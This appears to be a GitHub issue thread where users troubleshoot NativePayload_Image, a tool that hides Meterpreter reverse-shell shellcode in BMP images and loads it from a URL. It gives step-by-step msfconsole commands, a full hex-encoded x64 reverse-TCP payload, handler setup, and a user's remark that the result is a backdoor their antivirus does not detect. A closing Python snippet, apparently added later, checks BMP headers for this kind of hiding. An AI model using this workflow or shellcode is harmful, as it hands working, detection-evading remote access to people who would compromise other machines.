Closed Ciangi closed 7 years ago
Now you need to use the backdoor again with this syntax to download the BMP file from Apache; in this case your syntax is 👍
c:> NativePayload_Image.exe url "http://target_webserver_ip/test3.bmp" 449 54
Note: 449 is your payload length and 54 is your header length.
But your payload should be 510, I think; 449 is wrong maybe .... ;)
msf > use payload/windows/x64/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.1.104
LHOST => 192.168.1.104
msf payload(reverse_tcp) > generate
windows/x64/meterpreter/reverse_tcp - 449 bytes (stage 1)
http://www.metasploit.com
VERBOSE=false, LHOST=192.168.1.104, LPORT=4444, ReverseAllowProxy=false, ReverseConnectRetries=5, ReverseListenerThreaded=false, PayloadUUIDTracking=false, EnableStageEncoding=false, StageEncoderSaveRegisters=, StageEncodingFallback=true, PrependMigrate=false, EXITFUNC=process, AutoLoadStdapi=true, AutoVerifySession=true, AutoVerifySessionTimeout=30, InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true, EnableUnicodeEncoding=false, SessionRetryTotal=3600, SessionRetryWait=10, SessionExpirationTimeout=604800, SessionCommunicationTimeout=300
./NativePayload_Image.exe url "http://192.168.1.104:81/test3.bmp" 449 54
NativePayload_Image Tool , Published by Damon Mohammadbagher , April 2017 Detecting/Injecting Meterpreter Payload bytes from BMP Image Files
[+] Detecting Meterpreter Payload bytes by Image Files
[+] File Scanning .. . .
[+] Reading Payloads from URL "http://192.168.1.104:81/test3.bmp"
[+] Scanning Payload with length 449 from byte 54
Bingo Meterpreter session by BMP images ;)
Unhandled Exception:
System.DllNotFoundException: kernel32
  at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint)
  at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: kernel32
  at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint)
  at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0
I'm running on Kali Linux and I compiled your .cs code with Mono. Is that OK? I typed: mcs -out:NativePayload_Image.exe NativePayload_Image.cs
# mono --version
Mono JIT compiler version 4.6.2 (Debian 4.6.2.7+dfsg-1)
Copyright (C) 2002-2014 Novell, Inc, Xamarin Inc and Contributors. www.mono-project.com
	TLS:           __thread
	SIGSEGV:       altstack
	Notifications: epoll
	Architecture:  amd64
	Disabled:      none
	Misc:          softdebug
	LLVM:          supported, not enabled.
	GC:            sgen
Oh okay .... my Mono is for .NET 4.6 ... and it's not supported in your project ;D
OK, now tell me: do you have anti-virus? If yes, please check this without AV, so disable all AV features or exit that tool ;D and tell me your result now.
Damn man, yeah, make this project with .NET 4.0 or 3.5 hahahaahahaha
Yep, I have Avast; disabled it, opened the image and nothing ... :<
Do you know how to downgrade Mono? :( Or do you know another tool to compile .cs with .NET 4.0??
Just change your project properties to .NET 4.0, then it should work ;D
Mono: when you want to make a new project, I think you can select the .NET Framework version, then you can change it to 4.0 or 3.5.
AND 449 in this case is correct: your payload length is 449.
Unfortunately in MonoDevelop I can't do this XD
what a ....
Oh sorry! I can change it! But for 4.5, 4.5.1, 4.5.2, 4.6 and 4.6.1 !! ;(
In the "monodevelop" tool you can change it 👍 Project options => Build > General > Target framework: select Mono/.NET 4.0, or see gamelogic.co.za/grids/documentation-contents/how-to-set-your-target-framework-to-mono-net4-in-monodevelop/ or https://stackoverflow.com/questions/6378137/mono-how-to-change-target-framework
In this link maybe you can compile your code ;) https://www.tutorialspoint.com/compile_csharp_online.php
Not working :( But I have a great idea! I'll run Visual Studio 2015 Enterprise on my Windows and try to compile it in .NET 4 ;D
Okay, so I tried to compile it with .NET 4 or .NET 4 Client Profile and it's the same .... can't establish a connection :(
still got:
./test.exe url "http://192.168.1.104:81/test3.bmp" 449 54
NativePayload_Image Tool , Published by Damon Mohammadbagher , April 2017 Detecting/Injecting Meterpreter Payload bytes from BMP Image Files
[+] Detecting Meterpreter Payload bytes by Image Files
[+] File Scanning .. . .
[+] Reading Payloads from URL "http://192.168.1.104:81/test3.bmp"
[+] Scanning Payload with length 449 from byte 54
Bingo Meterpreter session by BMP images ;)
Unhandled Exception:
System.DllNotFoundException: kernel32
at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint)
at NativePayload_Image.Program.Main (System.String[] args) [0x0049f] in
Okay, I know where the problem is. Reference to that page: https://www.essentialobjects.com/forum/postsm17563_Syntax-Editor-throwing-exception-on-Linux--VirtualAlloc-not-found.aspx
System.EntryPointNotFoundException: VirtualAlloc
Answer: The controls are for Windows only and it uses Windows API extensively. It's not just one or two function calls. It's everywhere. Thus it's not possible to run on Linux.
I executed the exe file on Windows and it works like a charm! Thanks for the help!
To be honest with you, I got my first backdoor which is not detectable by my AVs :O Good job!
You're welcome
"
step1 : msfconsole
step2 : msf > use payload/windows/x64/meterpreter/reverse_tcp
step3 : set lhost 192.168.1.104
step4 : generate
finally you can use stage1
"
then
NativePayload_Image.exe create “test3.bmp” fc,48,83,e4,f0,e8,cc,00,00,00,41,51,41,50,52,51,56,48,31,d2,65,48,8b,52,60,48,8b,52,18,48,8b,52,20,48,8b,72,50,48,0f,b7,4a,4a,4d,31,c9,48,31,c0,ac,3c,61,7c,02,2c,20,41,c1,c9,0d,41,01,c1,e2,ed,52,41,51,48,8b,52,20,8b,42,3c,48,01,d0,66,81,78,18,0b,02,0f,85,72,00,00,00,8b,80,88,00,00,00,48,85,c0,74,67,48,01,d0,50,8b,48,18,44,8b,40,20,49,01,d0,e3,56,48,ff,c9,41,8b,34,88,48,01,d6,4d,31,c9,48,31,c0,ac,41,c1,c9,0d,41,01,c1,38,e0,75,f1,4c,03,4c,24,08,45,39,d1,75,d8,58,44,8b,40,24,49,01,d0,66,41,8b,0c,48,44,8b,40,1c,49,01,d0,41,8b,04,88,48,01,d0,41,58,41,58,5e,59,5a,41,58,41,59,41,5a,48,83,ec,20,41,52,ff,e0,58,41,59,5a,48,8b,12,e9,4b,ff,ff,ff,5d,49,be,77,73,32,5f,33,32,00,00,41,56,49,89,e6,48,81,ec,a0,01,00,00,49,89,e5,49,bc,02,00,11,5c,c0,a8,01,68,41,54,49,89,e4,4c,89,f1,41,ba,4c,77,26,07,ff,d5,4c,89,ea,68,01,01,00,00,59,41,ba,29,80,6b,00,ff,d5,6a,05,41,5e,50,50,4d,31,c9,4d,31,c0,48,ff,c0,48,89,c2,48,ff,c0,48,89,c1,41,ba,ea,0f,df,e0,ff,d5,48,89,c7,6a,10,41,58,4c,89,e2,48,89,f9,41,ba,99,a5,74,61,ff,d5,85,c0,74,0c,49,ff,ce,75,e5,68,f0,b5,a2,56,ff,d5,48,83,ec,10,48,89,e2,4d,31,c9,6a,04,41,58,48,89,f9,41,ba,02,d9,c8,5f,ff,d5,48,83,c4,20,5e,89,f6,6a,40,41,59,68,00,10,00,00,41,58,48,89,f2,48,31,c9,41,ba,58,a4,53,e5,ff,d5,48,89,c3,49,89,c7,4d,31,c9,49,89,f0,48,89,da,48,89,f9,41,ba,02,d9,c8,5f,ff,d5,48,01,c3,48,29,c6,48,85,f6,75,e1,41,ff,e7
[!] Making New Bitmap File ...
[!] Bitmap File Name : test3.bmp
[+] Creating Header for Bitmap File ...
[>] Header adding (length 54) : 424d5e0e00000000000036000000280000........
[+] Injecting Meterpreter Payload to Bitmap File ...
[>] Injecting Payload (length 449) : fc4883e4f0e8cc00000041514150525156........
[+] Adding Ex-Payload for Bitmap File ...
[>] Ex-Payload adding (length FF * 3114).
[!] File test3.bmp with length 4621 bytes Created.
then
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.104
exploit
then
cp test3.bmp /var/www/html/
then download and open the file from another computer (Windows x64 architecture) in the local network, and no session appears...
or...
when I want to publish it as a URL:
./NativePayload_Image.exe url "http://192.168.1.104:81/test3.bmp" 510 54
NativePayload_Image Tool , Published by Damon Mohammadbagher , April 2017 Detecting/Injecting Meterpreter Payload bytes from BMP Image Files
[+] Detecting Meterpreter Payload bytes by Image Files
[+] File Scanning .. . .
[+] Reading Payloads from URL "http://192.168.1.104:81/test3.bmp"
[+] Scanning Payload with length 510 from byte 54
Bingo Meterpreter session by BMP images ;)
Unhandled Exception:
System.DllNotFoundException: kernel32
  at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint)
  at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: kernel32
  at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint)
  at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0
Could you help me please?
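A defender-side consistency check for the BMP layout the tool's output above describes (54-byte header, payload written from byte 54, 0xFF padding after it): a carrier built this way tends to declare a file size and image geometry that do not match the bytes actually present. This is an added example, not code from this thread or from the NativePayload_Image project; the two sample files are constructed here and the entropy threshold is an assumption.

```python
import math
import struct

BMP_HEADER_LEN = 54  # 14-byte BITMAPFILEHEADER + 40-byte BITMAPINFOHEADER


def build_bmp(width, height, pixels, declared_size=None):
    """Build a minimal 24-bit BMP (constructed sample, not the tool's output)."""
    declared = len(pixels) + BMP_HEADER_LEN if declared_size is None else declared_size
    file_hdr = struct.pack("<2sIHHI", b"BM", declared, 0, 0, BMP_HEADER_LEN)
    info_hdr = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                           len(pixels), 2835, 2835, 0, 0)
    return file_hdr + info_hdr + pixels


def shannon_entropy(data):
    """Bits per byte over `data`; 0xFF padding is ~0, machine code is high."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts if c)


def check_bmp(data):
    """Return a list of findings; an empty list means the layout is consistent."""
    if len(data) < BMP_HEADER_LEN or data[:2] != b"BM":
        return ["not a BMP"]
    findings = []
    _, bf_size, _, _, off_bits = struct.unpack_from("<2sIHHI", data, 0)
    _, width, height, _, bpp = struct.unpack_from("<IiiHH", data, 14)
    if bf_size != len(data):  # header claims one size, file has another
        findings.append(f"declared size {bf_size} != actual {len(data)}")
    stride = ((width * bpp + 31) // 32) * 4  # rows are padded to 4 bytes
    expected = stride * abs(height)
    body = data[off_bits:]
    if len(body) != expected:  # pixel area does not fit the stated geometry
        findings.append(f"pixel area {len(body)} bytes, geometry needs {expected}")
    ent = shannon_entropy(body[:512])
    if ent > 6.0:  # assumed threshold; weak alone, photos are high-entropy too
        findings.append(f"first 512 pixel bytes look like code: entropy {ent:.2f}")
    return findings


# Constructed samples: a consistent 4x4 image, and a 4x4 header over a body of
# 449 opaque bytes plus 0xFF padding, mirroring the tool's output above.
CLEAN = build_bmp(4, 4, bytes([0x80, 0x40, 0x20] * 16))  # stride 12, 4 rows
_BLOB = bytes((i * 73 + 41) % 256 for i in range(449))  # stand-in, not shellcode
PADDED = build_bmp(4, 4, _BLOB + b"\xff" * 3114, declared_size=3678)
```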